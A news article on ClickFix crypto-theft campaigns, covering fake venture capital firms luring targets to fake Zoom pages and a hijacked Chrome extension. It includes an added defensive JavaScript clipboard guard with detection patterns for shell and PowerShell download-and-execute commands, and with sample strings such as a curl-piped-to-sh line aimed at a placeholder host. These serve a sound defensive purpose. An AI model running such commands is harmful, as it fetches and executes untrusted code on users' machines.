Crypto hackers attempting to use “ClickFix” attacks to steal crypto have now turned to impersonating venture capital firms and hijacking browser extensions in their two most recent attacks.
According to a report by cybersecurity firm Moonlock Lab on Monday, scammers are using fake venture capital firms such as SolidBit, MegaBit and Lumax Capital. The hackers are using the firms to contact users via LinkedIn with partnership offers, then funneling them to fake Zoom and Google Meet links.
When a target clicks the fraudulent link, they are taken to an event page featuring a fake Cloudflare “I’m not a robot” checkbox. Clicking it copies a malicious command to the clipboard, prompting the user to open their computer’s terminal and paste the so-called verification code, which then executes the attack.
“The ClickFix technique is what makes the final step so effective,” the Moonlock Lab team said. “By turning the victim into the execution mechanism — having them paste and run the command themselves — the attackers sidestep the very controls the security industry has spent years building. No exploit. No suspicious download.”
Moonlock Lab alleges that a person using the name Mykhailo Hureiev, listed as the co-founder and managing partner at SolidBit Capital, has been a primary point of contact for the initial LinkedIn phase of the scam. Two X users have also reported suspicious conversations with a Hureiev account.
However, Moonlock Lab notes that the campaign’s infrastructure is sophisticated and designed to rotate identities as soon as one front is exposed.
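The clipboard step behind the fake checkbox is one place a defender can intervene. The JavaScript below is an added example, not code from Moonlock Lab or this article: it classifies text a page tries to place on the clipboard and refuses writes that look like terminal commands. The pattern list, function names and sample strings are assumptions constructed for illustration.

```javascript
// Added example: hypothetical names throughout; not code from Moonlock Lab or the article.
// Heuristics for clipboard text that is meant to be pasted into a terminal.
// The patterns are illustrative assumptions, not indicators from the report.
const COMMAND_PATTERNS = [
  { name: "download-piped-to-shell", re: /\b(curl|wget)\b[^\n|]*\|\s*(ba|z)?sh\b/i },
  { name: "powershell-download-exec",
    re: /\b(powershell|pwsh)\b[\s\S]*\b(iex|invoke-expression|iwr|invoke-webrequest)\b/i },
  { name: "mshta-remote", re: /\bmshta(\.exe)?\s+https?:/i },
  { name: "base64-decode-to-shell", re: /\bbase64\s+(-d|--decode)\b[^\n]*\|\s*(ba|z)?sh\b/i },
];

// Return the names of every pattern the text matches (empty array = looks benign).
function classifyClipboardText(text) {
  const s = String(text);
  return COMMAND_PATTERNS.filter((p) => p.re.test(s)).map((p) => p.name);
}

// Wrap a clipboard-like object (navigator.clipboard when run in the page's own
// script context) so script-initiated writes of command-like text are refused.
// Limitation: covers writeText() only, not document.execCommand("copy").
function guardClipboard(clipboard, report) {
  const original = clipboard.writeText.bind(clipboard);
  clipboard.writeText = (text) => {
    const hits = classifyClipboardText(text);
    if (hits.length > 0) {
      report({ hits, length: String(text).length }); // log metadata, not the payload
      return Promise.reject(new Error("clipboard write blocked: command-like text"));
    }
    return original(text);
  };
  return clipboard;
}

// Constructed sample inputs (example.invalid is a reserved, non-resolving domain).
const SAMPLES = [
  "Verification ID: 483-221",
  "curl -s https://example.invalid/verify | sh",
  'powershell -w hidden -c "iwr https://example.invalid/a | iex"',
];

// Run the guard over SAMPLES with an in-memory stand-in for the clipboard.
function runDemo() {
  const written = [], blocked = [];
  const fake = { writeText: (t) => { written.push(t); return Promise.resolve(); } };
  const guarded = guardClipboard(fake, (r) => blocked.push(r.hits.join(",")));
  for (const s of SAMPLES) guarded.writeText(s).catch(() => {});
  return { written, blocked };
}
```

In a browser the wrapper only affects page scripts if it runs in the page's own JavaScript context before they do; a pattern match is a signal for review, not proof of malice.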
Chrome extension hijacked to steal crypto
Meanwhile, crypto hackers had, until recently, been using a malicious Chrome extension to deliver “ClickFix” attacks.
QuickLens, an extension that lets users run Google Lens searches directly in their browser, was removed from the web store after it was compromised to push malware, John Tuckner, the founder of cybersecurity firm Annex Security, said in a Feb. 23 report.
After QuickLens changed ownership on Feb. 1, a new version was released two weeks later containing malicious scripts that launched ClickFix attacks and other information-stealing tools. Tuckner noted that the extension had around 7,000 users.
The hijacked extension reportedly searched for crypto wallet data and seed phrases to steal funds. It also scraped the contents of Gmail inboxes, YouTube channel data, and other login credentials or payment information entered into web forms, according to an eSecurity Planet report on March 2.
ClickFix campaigns target multiple industries
The ClickFix technique has gained popularity among threat actors since last year, according to Moonlock Lab, because it forces victims to manually execute the malicious payload, bypassing standard security tools.
However, security researchers have been tracking its use since at least 2024, with targets spanning a wide range of industries.
Microsoft Threat Intelligence sent out a warning in August last year that it had been tracking “campaigns targeting thousands of enterprise and end-user devices globally every day.”
Meanwhile, cybersecurity company Unit 42 reported in July last year that the “relatively new social engineering technique” has been impacting industries such as manufacturing, wholesale and retail, state and local governments, and utilities and energy.